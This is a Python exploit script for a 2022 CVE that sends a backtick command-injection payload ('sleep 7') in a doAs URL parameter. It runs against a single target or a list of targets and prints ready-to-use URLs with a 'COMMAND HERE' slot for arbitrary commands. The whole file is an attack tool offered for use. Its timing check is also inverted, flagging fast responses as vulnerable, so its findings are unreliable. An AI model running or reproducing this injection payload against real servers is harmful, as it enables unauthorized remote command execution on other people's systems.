CVE-2022.33891.py

import requests
import argparse

def banner():
    print('''\033[0;34m
 _____ _   _ _____       _____  _____  _____  _____       _____  _____ _____  _____  __  
/  __ \ | | |  ___|     / __  \|  _  |/ __  \/ __  \     |____ ||____ |  _  ||  _  |/  | 
| /  \/ | | | |__ ______`' / /'| |/' |`' / /'`' / /'______   / /    / /\ V / | |_| |`| | 
| |   | | | |  __|______| / /  |  /| |  / /    / / |______|  \ \    \ \/ _ \ \____ | | | 
| \__/\ \_/ / |___      ./ /___\ |_/ /./ /___./ /___     .___/ /.___/ / |_| |.___/ /_| |_
 \____/\___/\____/      \_____/ \___/ \_____/\_____/     \____/ \____/\_____/\____/ \___/
                                                                                         
                           \033[0;34m[\033[0;37mScript coded by Amolo Hunters\033[0;34m]
    ''')

def urlexploit(url):
    if arguments.valid:
        try:
            r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10)
            if r.elapsed.total_seconds() <= 8:
                print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`')
        except:
            print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}')
            pass
    else:
        try:
            r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10)
            if r.elapsed.total_seconds() <= 8:
                print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`')
            else:
                print(f'\033[0;31m[-] \033[0;37mNot vulnerable: {url}')
        except:
            print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}')
            pass

def listexploit(file):
    if arguments.valid:
        f = open(file, 'r').read().splitlines()
        for url in f:
            try:
                r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10)
                if r.elapsed.total_seconds() <= 8:
                    print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`')
                else:
                    print(f'\033[0;31m[-] \033[0;37mNot vulnerable: {url}')
            except:
                print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}')
                pass
    else:
        f = open(file, 'r').read().splitlines()
        for url in f:
            try:
                r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10)
                if r.elapsed.total_seconds() <= 8:
                    print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`')
                else:
                    print(f'\033[0;31m[-] \033[0;37mNot vulnerable: {url}')
            except:
                print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}')
                pass

def main():
    banner()
    if arguments.turl:
        urlexploit(arguments.turl)
    if arguments.tlist:
        listexploit(arguments.tlist)

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-u','--url', action='store', help='target url', dest='turl', required=False)
    parser.add_argument('-l','--list', action='store', help='targets list', dest='tlist', required=False)
    parser.add_argument('-v', '--valid', action='store_true', help='only valid targets', dest='valid', required=False)
    arguments = parser.parse_args()
    main()